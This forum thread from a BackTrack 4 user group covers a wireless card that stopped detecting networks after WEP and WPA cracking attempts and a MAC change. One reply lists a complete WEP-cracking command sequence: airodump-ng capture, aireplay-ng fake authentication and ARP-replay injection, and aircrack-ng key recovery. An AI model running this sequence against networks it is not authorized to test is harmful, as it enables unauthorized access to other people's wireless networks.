Results 1 to 7 of 7

Thread: Wireless was working, now its not

  1. #1
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    2

    Default Wireless was working, now its not

    Specs:
    BT4 Pre-Final Live CD
    Broadcom 4318 MiniPCI

    What happened:
    I first started by trying doing a WEP injection attack on my local router, it worked out, I got my WEP key. Then I changed to working on a WPA handshake capture of another one of my local routers.

    While doing so, I noticed my capture channel kept changing, so I stopped the wlan0 and mon0 interfaces with airmon-ng and downed them w/ ifconfig. I then changed the mac of the wlan0 interface with macchanger, upped it w/ ifconfig. At this point it stopped recognizing my wireless networks. And not just my two, but the other six ones in the neighborhood.

    So I did the logical thing, I rebooted, thinking that this would solve the problem. Thing is, it didn't. It won't detect any of the available wireless networks, not in airmon-ng and not in wicd.

    I used to only detect three interfaces after running /etc/init.d/networking start, they were lo, eth0, and wlan0. Now, I get 4 interfaces: lo, eth0, wlan0, and wmaster0.

    So, what commands should I run to post the output here, so someone can help me?

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    76

    Default hope this work

    in bt4 pf i use this codes

    sudo su
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger -m 00:11:22:33:44:55 wlan0
    sudo su
    airmon-ng stop wlan0
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
    airodump-ng wlan0
    in different konsole each of these
    airodump-ng -c 11 -w noclient.cap wlan0
    aireplay-ng -1 30 -e essid -a bssid -h 00:11:22:33:44:55 wlan0
    aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 wlan0
    aircrack-ng -x noclient.cap-01.cap
    seconds away FOUND KEY

  3. #3
    Senior Member
    Join Date
    Aug 2007
    Posts
    916

    Default

    if you aren't familiar with airmon-ng creating mon0 interface, don't use airmon-ng.. learn to use iwconfig as it can turn the interface into monitor without having to create another inteface.

    Also I'd run iwevent to see if the channel is constantly hopping, if it is, chances are there is some other program accessing and adjusting the interface.. when it comes down to WEP cracking, make sure programs like networkmanager, wpa_supplicant, wicd, etc are all turned off. Then use airodump-ng to lock on one channel.

  4. #4
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Quote Originally Posted by manulu View Post
    in bt4 pf i use this codes


    in different konsole each of these
    Why are you using sudo twice??

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    Quote Originally Posted by Barry View Post
    Why are you using sudo twice??
    Skill.

    What is happening is your are setting up a monitor mode on vap, mon0. If you do not use mon0, then when you set a fixed channel, it still hops channels. Use the device for monitoring and mon0 for injecting or vice-versa.

  6. #6
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Quote Originally Posted by redhotfire View Post
    Skill.

    What is happening is your are setting up a monitor mode on vap, mon0. If you do not use mon0, then when you set a fixed channel, it still hops channels. Use the device for monitoring and mon0 for injecting or vice-versa.
    Uhh, no. Once you enter the sudo su command, you're root until you exit it. Looks like you're just following a script without actually knowing what you're doing....

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    Quote Originally Posted by Barry View Post
    Uhh, no.
    Sarcastic joke.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •